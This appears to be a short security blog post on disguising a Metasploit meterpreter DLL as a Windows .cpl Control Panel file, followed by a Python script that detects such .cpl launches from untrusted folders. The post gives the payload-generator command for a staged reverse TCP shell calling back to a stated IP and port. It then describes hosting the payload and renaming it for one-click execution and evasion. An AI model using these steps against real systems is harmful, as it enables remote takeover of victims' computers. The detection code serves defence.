Interesting .DLL,.CPL,EXE*

I was looking around at folder tricks and how they could be re-purposed for evil, gotta sharpen my mind to be super nasty (honey badger like, if you will). Anyway, I was on this site, http://blog.omotech.com/?p=1247, and I thought: hmm, what's this .cpl file type business ... so I search my computer for one listed ...

It has the same icon as a .DLL; I wonder if it behaves like a .DLL.

So, I jump on my Linux box and, using g0tmi1k's MSFvenom Payload Creator, create a meterpreter dll that will, as most of you can probably see, connect back to 192.168.0.180 on port 4433 when executed.

./mpc.sh dll 192.168.0.180 4433 msf reverse staged tcp

Done

As you can see, mpc even shows you how to make the payload accessible over the network via a simple Python web server, so ... do that.

Rename it from .dll to .cpl.

You now have an executable meterpreter payload that will launch from a click. What's cool about this is that it IS a .dll, but you can't double-click and launch it as a .dll, yet as a .cpl file you can. This might only be useful for evasion, in that it's an executable file extension that goes overlooked ... and I'll be looking for more.

I didn't know about this technique until I was playing around

Video here

https://www.youtube.com/embed/64x-i_siZHU

Some other information on .cpl abuse

The TrendMicro piece is pretty good
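
On the detection side, the double-click described above shows up in process-creation logs: the .cpl is handed to control.exe, which loads it through rundll32.exe shell32.dll,Control_RunDLL. The sketch below is an added example, not part of the original post; it flags those launches when the .cpl lives outside the Windows system directories. The event field names and sample events are constructed, and C:\Windows is assumed as the system root.

```python
import ntpath
import re

# Assumption: Windows is installed in C:\Windows (stock .cpl locations).
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# A quoted or unquoted command-line token that ends in .cpl
CPL_TOKEN = re.compile(r'"([^"]+\.cpl)"|([^\s",]+\.cpl)\b', re.IGNORECASE)

# Constructed process-creation events (field names are hypothetical).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\control.exe",
     "command_line": r'"C:\Windows\System32\control.exe" "C:\Users\bob\Downloads\update.cpl",'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\bob\Downloads\update.cpl",'},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl'},
    {"image": r"C:\Windows\System32\control.exe",
     "command_line": "control.exe timedate.cpl"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\bob\notes.cpl"},
]


def is_cpl_loader(image, command_line):
    """True for the two processes that load Control Panel items."""
    exe = ntpath.basename(image).lower()
    if exe == "control.exe":
        return True
    return exe == "rundll32.exe" and "control_rundll" in command_line.lower()


def suspicious_cpl_launches(events):
    """Return (loader, cpl_path) for .cpl files loaded from untrusted folders."""
    hits = []
    for ev in events:
        if not is_cpl_loader(ev["image"], ev["command_line"]):
            continue
        for quoted, bare in CPL_TOKEN.findall(ev["command_line"]):
            path = quoted or bare
            folder = ntpath.normcase(ntpath.dirname(path))
            # Assumption: a name with no folder ("timedate.cpl") is a stock item.
            if folder and folder not in TRUSTED_DIRS:
                hits.append((ntpath.basename(ev["image"]).lower(), path))
    return hits


if __name__ == "__main__":
    for loader, path in suspicious_cpl_launches(SAMPLE_EVENTS):
        print(f"ALERT {loader} loaded {path}")
```

The same rule translates directly to a SIEM query over process-creation events; the trusted-folder list is the part to tune per environment.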